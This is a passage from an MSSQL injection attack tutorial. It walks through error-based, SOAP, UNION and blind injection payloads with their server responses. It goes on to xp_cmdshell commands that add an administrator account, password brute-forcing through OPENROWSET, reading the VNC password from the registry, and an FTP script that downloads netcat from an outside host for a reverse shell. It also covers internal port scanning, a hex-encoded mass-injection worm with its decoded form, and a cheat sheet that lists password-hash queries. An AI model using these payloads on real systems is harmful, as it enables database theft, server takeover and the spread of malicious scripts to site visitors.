  ------------------------------------------------------------------------------------
  ADODB.Field error '800a0bcd'
  Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
  /page.asp, line 10 
  ------------------------------------------------------------------------------------

 This means no more column left. Next is the real target which attackers want, the data.
 If take a look carefully, we will see that the idea is not different from getting table and column.
 Use the same manner but change only table and column name.

 If we want uname data in table users, we can do like this:
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users))--
  [End SQLi]--------------------------------------------------------------------------

 We will see uname in returned error.
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'admin' to data type int.
  /page.asp, line 9 
  ------------------------------------------------------------------------------------

 Now, we know that there is 'admin' in column 'uname' of table 'users'. For another uname, 
 we just create a known table list as table and column.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin')))--
  [End SQLi]--------------------------------------------------------------------------

 Error again:
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e07'
  Conversion failed when converting the nvarchar value 'cwh' to data type int.
  /page.asp, line 9
  ------------------------------------------------------------------------------------

 OK, we get another "uname" which is 'cwh'. If we try following request.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1+and+1=convert(int,(select+top+1+uname+from+users+where+uname+not+in+('admin','cwh')))--
  [End SQLi]--------------------------------------------------------------------------

 And we get an error like this

  ------------------------------------------------------------------------------------
  ADODB.Field error '800a0bcd'
  Either BOF or EOF is True, or the current record has been deleted. Requested operation requires a current record.
  /showthread.asp, line 10 
  ------------------------------------------------------------------------------------

 It means there are only two uname in users table (admin,cwh).
 

 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
 [0x02d] - MSSQL Injection in Web Services (SOAP Injection)
 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  
  Web Services use XML messages that follow the SOAP standard and have been popular with traditional enterprise. 
 In such systems, there is often a machine-readable description of the operations offered by the service written in the 
 Web Services Description Language (WSDL). 
  SOAP is often used in large-scale enterprise applications where individual tasks are performed by different computers to 
 improve performance. It's often found where web application that deployed as a front-end to an existing application.

   Let's take a look for SOAP request like this:
 
  [SOAP Request]------------------------------------------------------------------------------

  POST /webservice/service.asmx HTTP/1.0
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/GetUserInfo"
  Host: testcwh.cwh.net
  Content-Length: 345
  Expect: 100-continue
  Connection: Keep-Alive
 
  
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  admin1234
  
  [End Request]-------------------------------------------------------------------------------
 
   Can you see username(admin) and password(1234) that send to Server side ?

   What's happen if we injection (') single quote to username field like this: admin'1234
  before It send to Server Side. We can use Web proxy (Burpsuite, Paros proxy) to intercept SOAP request and SOAP respond.

  [SOAP Respond When we inject single quote]--------------------------------------------------
 
  HTTP/1.1 200 OK
  Date: Mon, 26 Jan 2009 15:45:27 GMT
  Server: Microsoft-IIS/6.0
  X-Powered-By: ASP.NET
  X-AspNet-Version: 2.0.50727
  Cache-Control: private, max-age=0
  Content-Type: text/xml; charset=utf-8
  Content-Length: 1057
  Connection: close
  X-Junk: xxxxxxxxxxx
 
  
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  true
  System.Data.OleDb.OleDbException: Unclosed quotation mark after the character string ''.
  Incorrect syntax near '81'.
     at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr)
     at System.Data.OleDb.OleDbDataReader.NextResult()
     at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)
     at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)
     at Service.GetUserInfo(String username, String password)SELECT * FROM users WHERE username='admin'' 
     AND password='81dc9bdb52d04dc20036dbd8313ed055'-10001-01-01T00:00:00
     
  
  [End Respond]-------------------------------------------------------------------------------
 
  Okey, The SOAP respond return error message like that. We can use simple techiques for SQLi that we showed you 
  in section [0x02b] - ODBC Error Message Attack with "CONVERT", Let's use this SQLi: 
  
   admin' and 1=convert(int,@@version)--
 
  [SOAP Request/Respond]----------------------------------------------------------------------
  
  *** Request ***
  POST /webservice/service.asmx HTTP/1.0
  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MS Web Services Client Protocol 2.0.50727.1433)
  Content-Type: text/xml; charset=utf-8
  SOAPAction: "http://tempuri.org/GetUserInfo"
  Host: testcwh.cwh.net
  Content-Length: 384
  
  
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  admin' and 1=convert(int,@@version)--1234
  
  
  
  *** Response ***
  HTTP/1.1 200 OK
  Date: Wed, 28 Jan 2009 15:59:17 GMT
  Server: Microsoft-IIS/6.0
  X-Powered-By: ASP.NET
  X-AspNet-Version: 2.0.50727
  Cache-Control: private, max-age=0
  Content-Type: text/xml; charset=utf-8
  Content-Length: 1266
  Connection: close
  X-Junk: xxxxxxxxxxx
  
  
  xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  true
  System.Data.OleDb.OleDbException: Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86) 
  Feb  9 2007 22 begin_of_the_skype_highlighting            9 2007 22      end_of_the_skype_highlighting:47:07 
  Copyright (c) 1988-2005 Microsoft Corporation
  Express Edition on Windows NT 5.2 (Build 3790: Service Pack 1)
  ' to data type int.
  at System.Data.OleDb.OleDbDataReader.ProcessResults(OleDbHResult hr)
  at System.Data.OleDb.OleDbDataReader.NextResult()
  at System.Data.OleDb.OleDbCommand.ExecuteReaderInternal(CommandBehavior behavior, String method)
  at System.Data.OleDb.OleDbCommand.ExecuteReader(CommandBehavior behavior)
  at Service.GetUserInfo(String username, String password)SELECT * FROM users WHERE username='admin' 
  and 1=convert(int,@@version)--' AND password='81dc9bdb52d04dc20036dbd8313ed055'-10001-01-01T00:00:00
  
 
  [End]---------------------------------------------------------------------------------------
 
   W00t!! W00t!!, We can enumerate MSSQL Version : Microsoft SQL Server 2005 - 9.00.3042.00 (Intel X86).
  Then we can use SQLi techniques that we mention above (Dump tables, columns, data, Etc).

 ++++++++++++++++++++++++++++++++++++++++++++++
  [0x02c] - MSSQL Injection with UNION Attack
 ++++++++++++++++++++++++++++++++++++++++++++++

  This method differs from the both previous methods because we do not get information through error 
 but we, instead, see it in some point of returned page.

 First of all, we have to know the exact number of selected column. We can find it by using ORDER BY clause.

  http://www.example.com/page.asp?id=1 order by 1--
  http://www.example.com/page.asp?id=1 order by 2--
  http://www.example.com/page.asp?id=1 order by 3--
  http://www.example.com/page.asp?id=1 order by 4--
  and so on

 We observe a result from each request until we get error like this.
  
  ------------------------------------------------------------------------------------
  Microsoft SQL Native Client error '80040e14'
  The ORDER BY position number 5 is out of range of the number of items in the select list.
  /showthread.asp, line 9
  ------------------------------------------------------------------------------------

 This means this page select four columns from table and this error occurs when we request http://www.example.com/page.asp?id=1 order by 5--

 Now, we use UNION operator to gain information.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,44--
  [End SQLi]--------------------------------------------------------------------------

 We will see "11" or "22" or "33" or "44" appeared on some point in returned page. We assume that 
 we have already located the position which "44" occur on the screen.
 (We should remember this position because it is where our information will be appeared)

 As we found "44" on the screen, we replace "44" with "@@version" in order to find the version of MSSQL.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,@@version--
  [End SQLi]--------------------------------------------------------------------------

 We will see version of MSSQL appeared in the position which "44" occurred.

 At this point, we know that next information definitely takes place in this position.

  The rest are to find table names, column names and data. As we see in previous section, 
 we can obtain table names and column names through "information_schema" database.
 We still use the same way in this approach.
  
  [SQli]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables--
  [End SQLi]--------------------------------------------------------------------------

 We will see the first table on the screen. We assume it is table called 'threads'. We can find next table by following request.
  
  [SQli]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,table_name from information_schema.tables where table_name not in ('threads')--
  [End SQLi]--------------------------------------------------------------------------

 We assume the retrieved table is 'users'. So, we append a known table list until we get blank in position which "44" occurred.
 After we get all table names that we want, we move to gather column names.
  
  [SQli]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users'--
  [End SQLi]--------------------------------------------------------------------------

 From this request, we will see the first column in table 'users'. We assume it is 'uname'. For another column, we can use following request.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,column_name from information_schema.columns where table_name='users' and 
  column_name not in ('uname')--
  [End SQLi]--------------------------------------------------------------------------

 We get the second column which is 'upass' and we continue appending a known column list until we get blank result.
 The most wanted information is data. It is quite simple after we obtained table names and column names. We just use following request.
  
  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users--
  [End SQLi]--------------------------------------------------------------------------

 We will get data such as admin from the request. In order to get another row, we only append information list as following.

  [SQLi]------------------------------------------------------------------------------
  http://www.example.com/page.asp?id=1 and 1=2 UNION SELECT 11,22,33,uname from users where uname not in ('admin')--
  [End SQLi]--------------------------------------------------------------------------
 
 Now, we can enumerate the rest data.


###########################################
 [0x03] - MSSQL Blind SQL Injection Attack
###########################################

 
 In some case, Using normal sql injection is not work. Blind sql injection is another method which may help you.
The important point for blind sql injection is the difference between the valid and invalid query result.
You have to inject a statement to make query valid or invalid and observe the response.
 Just because you don't see any results, doesn't mean that your injected SQL is not being executed !!


 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x03a] - How to Test sites that are vulnerable in Blind SQL Injection
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

  We assume that http://www.example.com/page.asp?id=1 is normal url to open web page.

 You can try to inject a statement like this

 http://www.example.com/page.asp?id=1 and 1=1 
 and
 http://www.example.com/page.asp?id=1 and 1=2

  If the results from these requests are different, it will be a good signal for you.
 This website may fall to blind sql injection vulnerability. When you put "id=1 and 1=1", 
 it means that the condition is true so, the response must be normal. 
 But the parameter "id=1 and 1=2" indicates that the condition is false 
 and if the webmaster does not provide a proper filter, the response absolutely differs from previous.


 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x03b] - Determine data through Blind SQL Injection
 ++++++++++++++++++++++++++++++++++++++++++++++++++++++

  By using blind technique, you have to spend more time than normal injection. 
 You can obtain only one character while you send several queries to server.
 We will give you an example of querying the first character of database name. 
 We assume that database name is member. Therefore, the first character is "m" 
 which the ascii value is 109. (At this point, we assume that you know ascii code)

 Ok, first, we have to know that the results from requests have only 2 forms.

 1. Valid query result likes http://www.example.com/page.asp?id=1 and 1=1
 2. Invalid query result likes http://www.example.com/page.asp?id=1 and 1=2

 
 The following steps are up to each person. You idea may be different from our idea in order to pick ascii code to test query.

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>90

 In this situation, the result will be valid query result like http://www.example.com/page.asp?id=1 and 1=1 
 (because the first character of database name is "m" which ascii code is 109). Then, we try

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>120

 It is surely that the result will like http://www.example.com/page.asp?id=1 and 1=2 (because 109 absolutely less than 120).
 next, we try

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>105

 The result is a valid query result and at this point, the ascii value of first character of database name is between 105 and 120.
 So, we try

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>112  ===> invalid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>108  ===> valid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>110  ===> invalid query result
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)>109  ===> invalid query result

  You see that the first character of database name has an ascii value which is greater than 108 
 but is not greater than 109. Thus, we can conclude that the ascii value is equal to 109.
 You can prove with:
 
 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT LOWER(db_name(0)))AS varchar(8000)),1,1)),0)=109 .
 
 We sure that the result is like the result of http://www.target.com/page.php?id=1 and 1=1 .

 The rest which you have to do is to manipulate some queries to collect your preferred information.
 In this tutorial, we propose some example queries in order to find the names of tables and columns in the database.


 ++++++++++++++++++++++++++++++++++++++++++++
  [0x03c] - Exploit query for get Table name 
 ++++++++++++++++++++++++++++++++++++++++++++

  In order to get table name, we can use above method to obtain each character of table name.
 The only thing that we have to do is to change query to retrieve table name of current database. 
 As MSSQL does not have limit command. Therefore, the query is a bit complicate.

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) 
 FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
 AS varchar(8000)),1,1)),0)>97

  The above query is used to determine the first character of first table in current database. If we want to find second character of first table,
 we can do by following request:

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) 
 FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 1 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
 AS varchar(8000)),2,1)),0)>97

  We change the second parameter of substring function from 1 to 2 in order to specify preferred position of character in table name.
 Thus, if we want to determine other positions, we require only changing second parameter of substring function.

  In case of other tables, we can find other table names by changing the second select 
 from "SELECT TOP 1" to be "SELECT TOP 2" , "SELECT TOP 3" and so on. for example,

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT TOP 1 LOWER(name) 
 FROM sysObjects WHERE xtYpe=0x55 AND name NOT IN(SELECT TOP 2 LOWER(name) FROM sysObjects WHERE xtYpe=0x55))
 AS varchar(8000)),1,1)),0)=97

  The above request will determine the first character of the second table name in current database.


 +++++++++++++++++++++++++++++++++++++++++++++
  [0x03d] - Exploit query for get Column name 
 +++++++++++++++++++++++++++++++++++++++++++++

  After we obtain table names, the next target information is absolutely column names. 

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),1,1)),0)>97

  In order to circumvent from magic quote filtering, you have to change 'tablename' 
 to be the form of concatenating char() command. for example, if table name is 'user', 
 when we put 'user' in the query, ' may be filtered and our query will be wrong.
 The solution is convert 'user' to be char(117)+char(115)+char(101)+char(114). 
 So, the query in where cluase changes from "Where name='user'" to "Where name=char(117)+char(115)+char(101)+char(114)".
 In this case, we can circumvent magic quote filtering. The result from the above request is the first character of the first column name of specific table.
 When we want to find the second character of the first column, we can use the same method as getting table name, by changing the second parameter of 
 substring function.

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=1))AS varchar(8000)),2,1)),0)>97

 The above request is used to determine the second character of the first column name in specific table.
 In case of determining other columns, we can do by changing p.x value from 1 to 2,3,4 and so on. such as,

 http://www.example.com/page.asp?id=1 AND ISNULL(ASCII(SUBSTRING(CAST((SELECT p.name FROM (SELECT (SELECT COUNT(i.colid)rid FROM 
 syscolumns i WHERE(i.colid<=o.colid) AND id=(SELECT id FROM sysobjects WHERE name='tablename'))x,name FROM syscolumns o WHERE 
 id=(SELECT id FROM sysobjects WHERE name='tablename')) as p WHERE(p.x=2))AS varchar(8000)),1,1)),0)>97

 The first character of the second column name in specific table can be determined by the above request.


############################################## 
 [0x04] - More Dangerous SQL Injection Attack
##############################################
  
  In Chapter [0x02] and [0x03], We described about retrieving any useful data that was extracted from database 
 via SQL Injection techniques - for example, by performing a UNION Attack, Returning data in an error message and Blind injection. 
  This chapter will not show only an data extraction but command execution and sql worms as well.

 +++++++++++++++++++++++++++++++++++++++++++++++++++++
  [0x04a] - Dangerous from Extended Stored Procedures
 +++++++++++++++++++++++++++++++++++++++++++++++++++++

  xp_cmdshell          - Executes a given command on the MSSQL Operation system
                - Available by default on all MSSQL (Disabled on MSSQL 2005)
                - Can only be executed by 'sa' and any other users with 'sysadmin' privileges
  
  xp_regxxx            - Read/Write registry keys, potentially including the Read SAM file
   
   xp_regread 
   xp_regwrite
   xp_regdeletekey
   xp_regdeletevalue
   xp_regenumkeys
   xp_regenumvalues

   [Example for determines what null-session shares are available on the server]
   exec xp_regread HKEY_LOCAL_MACHINE,'SYSTEM\CurrentControlSet\Services\lanmanserver\parameters','nullsessionshares'
 
  xp_servicecontrol    - Allows to Manage Services
   
   [Example Command]--------------------------------------------------------------------
   exec master..xp_servicecontrol 'start','schedule'
   exec master..xp_servicecontrol 'start','server'
   [End Command]------------------------------------------------------------------------
  
  xp_availablemedia    - Reveals the available drives on the machine
  xp_dirtree      - Allows a directory tree to be obtained
  xp_enumdsn      - Enumerates ODBC data sources on the server
  xp_makecab      - Allows the user to create a compressed archive of files on the server
  xp_ntsec_enumdomains - Enumerates domains that the server can access
  xp_terminate_process - Terminate a process (PID)
  xp_loginconfig      - Login mode
 
 +++++++++++++++++++++++++++++++++++++++++++++
  [0x04b] - Advanced SQL Injection Techniques
 +++++++++++++++++++++++++++++++++++++++++++++
  
  "xp_cmdshell" Stored procedures, executes any command shell in the server with the same permissions that it is currently running. 
 By default, only sysadmin is allowed to use it and in SQL Server 2005 it is disabled by default (it can be enabled again using sp_configure) 

 EXEC master.dbo.xp_cmdshell 'net user cwh cwh1234 /add' ;--   //Use for add user "cwh" into system.
 EXEC master.dbo.xp_cmdshell 'net localgroup administrators cwh /add' ;-- //Use for escalating privilege "cwh" to admin group

 Example through SQL injection in a numeric field via a GET request:
 http://www.example.com/news.asp?id=1; exec master.dbo.xp_cmdshell 'command'

 On MSSQL 2005 you may need to reactivate xp_cmdshell first as it's disabled by default:

 EXEC sp_configure 'show advanced options', 1;--
 RECONFIGURE;-- 
 EXEC sp_configure 'xp_cmdshell', 1;-- 
 RECONFIGURE;--  

 On MSSQL 2000:
 
 If you have 'sa' privileges but xp_cmdshell has been disabled/removed with sp_dropextendedproc, 
 we can simply inject the following code:

 EXEC sp_addextendedproc 'xp_anyname', 'xp_log70.dll';--

  This creates a new stored procedure 'xp_anyname' linked to xp_log70.dll, which provides the xp_cmdshell functionality.
 If the previous code does not work, it means that the xp_log70.dll has been moved or deleted. In this case we need to inject the following code:

  CREATE PROCEDURE xp_cmdshell(@cmd varchar(255), @Wait int = 0) AS
  DECLARE @result int, @OLEResult int, @RunResult int
  DECLARE @ShellID int
  EXECUTE @OLEResult = sp_OACreate 'WScript.Shell', @ShellID OUT
  IF @OLEResult <> 0 SELECT @result = @OLEResult
  IF @OLEResult <> 0 RAISERROR ('CreateObject %0X', 14, 1, @OLEResult)
  EXECUTE @OLEResult = sp_OAMethod @ShellID, 'Run', Null, @cmd, 0, @Wait
  IF @OLEResult <> 0 SELECT @result = @OLEResult
  IF @OLEResult <> 0 RAISERROR ('Run %0X', 14, 1, @OLEResult)
  EXECUTE @OLEResult = sp_OADestroy @ShellID
  return @result
 
 ** Tip **

 [Question] 
  Determined that the web application connects to the DB with unprivileged account. 
 So we can't execute XP_CMDSHELL or access any interesting data ?

 [Answer]   
  It's not the end, First we must enumerate MSSQL user accounts that have system administrator privileges.

 [Code]--------------------------------------------------------------------------------------
 http://www.example.com/news.asp?id=1 union all select null,null,name,null,null,null,null from master..syslogins where name not in ('sa') and sysadmin=1;--
 [End Code]----------------------------------------------------------------------------------
  
 [Result]------------------------------------------------------------------------------------
 sa
 cwh
 example
 [End Result]--------------------------------------------------------------------------------
  
  We can use "OPENROWSET" to re-connect to the same database server under each enumerated 
 sysadmin account and guess passwords. This was automated via a Perl script to do brute-force password guessing through the SQL injection:
 
 [Code]--------------------------------------------------------------------------------------
 http://www.example.com/news.asp?id=1 union select * from openrowset('SQLoledb','server=VICTIMDBNAME;uid=$USER;pwd=$PASS','select * from master..sysusers')--
 [End Code]----------------------------------------------------------------------------------

 //Result: Found that "CWH" has a "1234"
     
  Leveraged the "OPENDATASOURCE" function to execute a stored procedure on the database, under the "CWH" system administrator credentials:
 
 [Code]--------------------------------------------------------------------------------------
 http://www.example.com/news.asp?id=1; EXEC opendatasource('SQLoledb','Persist Security Info=False;DataSource=VICTIMDBNAME;UserID=CWH;Password=1234').master
 .dbo.xp_cmdshell 'net user hacklol 1234 /add';
 [End Code]----------------------------------------------------------------------------------

 //Dirty Attack: use TFTP Netcat and run a reverse shell. Gained Internet access to the internal network.

 
 = How about Upload of executables ? =

  Once we can use xp_cmdshell (either the native one or a custom one), we can easily upload executables on the target DB Server. 
 A very common choice is netcat.exe, but any trojan will be useful here. If the target is allowed to start FTP connections to the tester's machine, 
 all that is needed is to inject the following queries: 
 
 exec master..xp_cmdshell 'echo open ftp.tester.org > ftpscript.txt';--
 exec master..xp_cmdshell 'echo USER >> ftpscript.txt';-- 
 exec master..xp_cmdshell 'echo PASS >> ftpscript.txt';--
 exec master..xp_cmdshell 'echo bin >> ftpscript.txt';--
 exec master..xp_cmdshell 'echo get nc.exe >> ftpscript.txt';--
 exec master..xp_cmdshell 'echo quit >> ftpscript.txt';--
 exec master..xp_cmdshell 'ftp -s:ftpscript.txt';--


 = How about Retrieving VNC Password from Registry ? =

 '; declare @out binary(8)
 exec master..xp_regread
 @rootkey = 'HKEY_LOCAL_MACHINE',
 @key = 'SOFTWARE\ORL\WinVNC3\Default',
 @value_name='password',
 @value = @out output
 select cast (@out as bigint) as x into TEMP--
 
 ' and 1 in (select cast(x as varchar) from temp)--


 = How about Port Scanning ? =

  We can use SQL injection vulnerability as a rudimentary IP/Port Scanner of the Internal Network or Internet

 [Code]--------------------------------------------------------------------------------------
 http://www.example.com/news.asp?id=1 union select * from openrowset('SQLoledb','uid=sa;pwd=;Network=DBMSSOCN;Address=10.10.10.12,80;timeout=5',
 'select * from table')--
 [End Code]----------------------------------------------------------------------------------
  
   This Code will outbound the connection to 10.10.10.12 over port 80. If the port is closed, the timeout (5 seconds) 
  in parameter will be consumed and display error message:

   "SQL Server does not exist or access denied"

  If port is open, the timeout would not be consumed and error messages will returned:

   "General network error. Check your network documentation"
   or
   "OLE DB provider 'sqloledb' reported an error. The provider did not give any information about the error."
  
  This technique, We will be able to map open ports on the IP addresses of hosts on the internal network (w00t !!)

  ** Note **
   This technique can use for Denial of Service (DoS). Just change port to some port such as: FTP (21), and change timeout too high (500).
  It's make many connections to target over FTP service (port 21)

 ++++++++++++++++++++++++++++++++++++++
  [0x04c] - Mass MSSQL Injection Worms
 ++++++++++++++++++++++++++++++++++++++
  
  Recently, we came across a particularly interesting type of SQL Injection that, at times, can be quite difficult to clean, 
 even with the most robust database backup and recovery scheme. This attack is conducted with the help of an Internet robotalso 
 known as malbotwhich attacks its prospects daily. It is likely that such a malbot fires the series of injection attempts continuously 
 and conditionally until the malicious script references are sensed on the targeted web pages. There is nothing new in the way that 
 the following T-SQL is injected. Yet, the generic nature of the script is somewhat interesting to see.

  
 [SQLi worm]---------------------------------------------------------------------------------
 ';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C004100520045002000400054002000760061007200630068006100720028003200350035
 0029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F004300
 7500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E
 0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E0073002000
 6200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D0027007500270020
 0061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F0072002000
 62002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);--
 [End SQLi]----------------------------------------------------------------------------------

  When we decode this SQLi Code with Hex:

 [SQLi Decoded]------------------------------------------------------------------------------

 DECLARE @T VARCHAR(255)
 DECLARE @C VARCHAR(255)

 DECLARE Table_Cursor CURSOR FOR
 SELECT [A].[Name], [B].[Name]
 FROM sysobjects AS [A], syscolumns AS [B]
 WHERE [A].[ID] = [B].[ID] AND
 
 [A].[XType] = 'U' /* Table (User-Defined) */ AND
 ([B].[XType] = 99 /* NTEXT */ OR
 [B].[XType] = 35 /* TEXT */ OR
 [B].[XType] = 231 /* SYSNAME */ OR
 [B].[XType] = 167 /* VARCHAR */)
 
 OPEN Table_Cursor
 FETCH NEXT FROM Table_Cursor INTO @T,@C 
 
 WHILE (@@FETCH_STATUS = 0)
 
 BEGIN
 EXEC('UPDATE [' + @T + '] SET [' + @C + '] = RTRIM(CONVERT(VARCHAR, [' + @C + '])) + ''''')
 FETCH NEXT FROM Table_Cursor INTO @T, @C
 END
 
 CLOSE Table_Cursor
 DEALLOCATE Table_Cursor 
 
 [End SQLi]----------------------------------------------------------------------------------

  What happens as a result? It finds all text fields in the database and adds a link to malicious javascript 
  to each and every one of them which will make your website display them automatically. 
 So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as 
 an article ID, product ID, etc) parameter and tried to use that to upload their SQL injection code.


######################################## 
 [0x05] - MSSQL Injection Cheat Sheet
########################################
 
  ** Some of the queries in the table below can only be run by an admin (SA Privilege). 
 These are marked with "-- priv" at the end of the query. **

 +---------------+---------------------------------------------------------------------------+
 |    Version    | SELECT @@version           |
 |---------------|---------------------------------------------------------------------------|
 |   Comments    | SELECT 1 -- comment           |
 |               | SELECT /*comment*/1           |
 |---------------|---------------------------------------------------------------------------|
 |  | SELECT user_name();           |
 |               | SELECT system_user;           |
 | Current User | SELECT user;            |
 |               | SELECT loginame FROM master..sysprocesses WHERE spid = @@SPID      |
 |---------------|---------------------------------------------------------------------------|
 |  List Users   | SELECT name FROM master..syslogins         |
 |---------------|---------------------------------------------------------------------------|
 |  | MSSQL2000: SELECT name, password FROM master..sysxlogins -- priv     |
 |  |             |
 |      |      SELECT name, master.dbo.fn_varbintohexstr(password)            |
 |   |      FROM master..sysxlogins -- priv        |
 | List Password |             |
 |    Hashes | MSSQL2005: SELECT name, password_hash FROM        |
 |  |      master.sys.sql_logins -- priv        |
 |      |             |
 |  |      SELECT name + '-' +         |
 |  |      master.sys.fn_varbintohexstr(password_hash)      |
 |  |      FROM master.sys.sql_logins -- priv        |
 |---------------|---------------------------------------------------------------------------|
 |   | SELECT is_srvrolemember('sysadmin'); -- is your account a sysadmin?     |
 |  | returns 1 for true, 0 for false, NULL for invalid role.      |
 |  | Also try 'bulkadmin', 'systemadmin' and other values.       |
 |   List DBA |              |
 |   Accounts |             |
 |   | SELECT is_srvrolemember('sysadmin', 'sa'); -- is sa a sysadmin?     |
 |  | return 1 for true, 0 for false, NULL for invalid role/username.     |
 |---------------|---------------------------------------------------------------------------|
 |   Current DB  | SELECT DB_NAME()           |
 |---------------|---------------------------------------------------------------------------|
 |     List | SELECT name FROM master..sysdatabases;        |
 |   Databases | SELECT DB_NAME(N); -- for N = 0, 1, 2, ...        |
 |---------------|---------------------------------------------------------------------------|
 |  | SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE   |       
 |  | name = 'mytable'); -- for the current DB only        |
 |  |             |
 | List Columns | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype) FROM  |
 |  | master..syscolumns, master..sysobjects WHERE        |
 |  | master..syscolumns.id=master..sysobjects.id AND       |
 |  | master..sysobjects.name='sometable'; -- list colum names      |
 |  | and types for master..sometable         |
 |---------------|---------------------------------------------------------------------------|
 |  | SELECT name FROM master..sysobjects WHERE xtype = 'U';      |
 |  | (Use xtype = 'V' for views)          |
 |  | SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';      |
 |  |             |
 |  List Tables | SELECT master..syscolumns.name, TYPE_NAME(master..syscolumns.xtype)     |
 |  | FROM master..syscolumns, master..sysobjects WHERE       |
 |  | master..syscolumns.id=master..sysobjects.id AND       |
 |  | master..sysobjects.name='sometable'; -- list column names and types     |
